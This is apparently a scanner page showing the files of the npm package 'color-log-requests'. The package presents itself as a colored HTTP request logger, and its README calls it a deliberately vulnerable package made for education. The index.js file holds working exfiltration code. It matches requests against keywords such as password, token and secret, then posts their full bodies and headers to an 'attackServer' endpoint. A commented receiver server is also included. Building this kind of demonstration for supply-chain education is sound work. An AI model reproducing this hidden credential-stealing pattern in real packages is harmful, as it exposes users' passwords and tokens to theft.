color-log-requests 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of color-log-requests might be problematic. Click here for more details.
- package/README.md +49 -0
- package/attackServer.js +21 -0
- package/index.js +73 -0
- package/package.json +20 -0
package/README.md
ADDED
@@ -0,0 +1,49 @@
|
|
1
|
+
**Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
|
2
|
+
|
3
|
+
This package is a vulnerable package and is created for educational purposes.
|
4
|
+
|
5
|
+
|
6
|
+
## Usage
|
7
|
+
this package is a HTTP request logger middleware for node.js
|
8
|
+
|
9
|
+
|
10
|
+
```javascript
|
11
|
+
const logger = require('color-log-requests');
|
12
|
+
app.use(logger);
|
13
|
+
```
|
14
|
+
|
15
|
+
The result is in the format:
|
16
|
+
|
17
|
+
```bash
|
18
|
+
<resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
|
19
|
+
```
|
20
|
+
|
21
|
+
The status codes are displayed in color:
|
22
|
+
- green for success (< 300)
|
23
|
+
- magenta for redirect (<400)
|
24
|
+
- red for failure (<600)
|
25
|
+
- blank otherwise
|
26
|
+
|
27
|
+
|
28
|
+
## Requirements
|
29
|
+
It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
|
30
|
+
```bash
|
31
|
+
npm install body-parser
|
32
|
+
```
|
33
|
+
|
34
|
+
The call in code may look like this:
|
35
|
+
```javascript
|
36
|
+
const bodyParser = require('body-parser');
|
37
|
+
app.use(bodyParser.json());
|
38
|
+
|
39
|
+
...
|
40
|
+
const logger = require('color-log-requests');
|
41
|
+
app.use(logger);
|
42
|
+
```
|
43
|
+
|
44
|
+
|
45
|
+
## Installation
|
46
|
+
Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
|
47
|
+
```
|
48
|
+
npm install color-log-requests
|
49
|
+
```
|
package/attackServer.js
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
// const http = require('http');
|
2
|
+
|
3
|
+
// const host = "127.0.0.1";
|
4
|
+
// const port = 2222;
|
5
|
+
|
6
|
+
|
7
|
+
// const server = http.createServer((req, res) => {
|
8
|
+
// const chunks = [];
|
9
|
+
// req.on("data", (chunk) => {
|
10
|
+
// chunks.push(chunk);
|
11
|
+
// });
|
12
|
+
// req.on("end", () => {
|
13
|
+
// const data = Buffer.concat(chunks);
|
14
|
+
// console.log("New sensitive request: ", JSON.parse(data.toString()));
|
15
|
+
// res.end();
|
16
|
+
// });
|
17
|
+
// })
|
18
|
+
|
19
|
+
// server.listen(port, host, () => {
|
20
|
+
// console.log(`Server is running on http://${host}:${port}`);
|
21
|
+
// });
|
package/index.js
ADDED
@@ -0,0 +1,73 @@
|
|
1
|
+
const axios = require("axios")
|
2
|
+
|
3
|
+
const attackServer = "127.0.0.1"
|
4
|
+
const aAttackPort = 2222
|
5
|
+
|
6
|
+
|
7
|
+
const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
|
8
|
+
|
9
|
+
|
10
|
+
const stringContainsSensitiveValue = (string) => {
|
11
|
+
let response = false
|
12
|
+
sensitiveValues.forEach(value => {
|
13
|
+
if (string.toLowerCase().includes(value.toLowerCase())) {
|
14
|
+
response = true
|
15
|
+
}
|
16
|
+
})
|
17
|
+
return response
|
18
|
+
}
|
19
|
+
|
20
|
+
|
21
|
+
|
22
|
+
const dictContainsSensitiveValue = (dict) => {
|
23
|
+
let response = false
|
24
|
+
for (let key in dict) {
|
25
|
+
if (stringContainsSensitiveValue(key)) {
|
26
|
+
response = true
|
27
|
+
}
|
28
|
+
}
|
29
|
+
return response
|
30
|
+
}
|
31
|
+
|
32
|
+
|
33
|
+
|
34
|
+
module.exports = function (req, res, next) {
|
35
|
+
res.on("finish", function () {
|
36
|
+
const date = new Date()
|
37
|
+
|
38
|
+
if (res.statusCode < 300) { // Success
|
39
|
+
console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
|
40
|
+
} else if (res.statusCode < 400) { // Redirection
|
41
|
+
console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
|
42
|
+
} else if (res.statusCode < 600) { // Client or server Error
|
43
|
+
console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
|
44
|
+
} else { // Unknown
|
45
|
+
console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
|
46
|
+
}
|
47
|
+
|
48
|
+
|
49
|
+
if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
|
50
|
+
axios.post(`http://${attackServer}:${aAttackPort}`, {
|
51
|
+
url: decodeURI(req.url),
|
52
|
+
host: req.headers.host,
|
53
|
+
method: req.method,
|
54
|
+
date: date.toLocaleString(),
|
55
|
+
client: {
|
56
|
+
ip: req.ip,
|
57
|
+
body: req.body,
|
58
|
+
headers: req.headers,
|
59
|
+
httpVersion: req.httpVersion,
|
60
|
+
},
|
61
|
+
response: {
|
62
|
+
statusCode: res.statusCode,
|
63
|
+
body: res.body,
|
64
|
+
headers: res.headers,
|
65
|
+
contentLength: res.get('Content-Length') || 0
|
66
|
+
}
|
67
|
+
})
|
68
|
+
}
|
69
|
+
|
70
|
+
|
71
|
+
});
|
72
|
+
next();
|
73
|
+
}
|
package/package.json
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
{
|
2
|
+
"name": "color-log-requests",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "This package is a vulnerable package and is created for educational purposes.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"start": "node index.js"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"test",
|
11
|
+
"vulnerable",
|
12
|
+
"logging",
|
13
|
+
"color"
|
14
|
+
],
|
15
|
+
"author": "Pierrick Delrieu",
|
16
|
+
"license": "ISC",
|
17
|
+
"dependencies": {
|
18
|
+
"axios": "^1.3.3"
|
19
|
+
}
|
20
|
+
}
|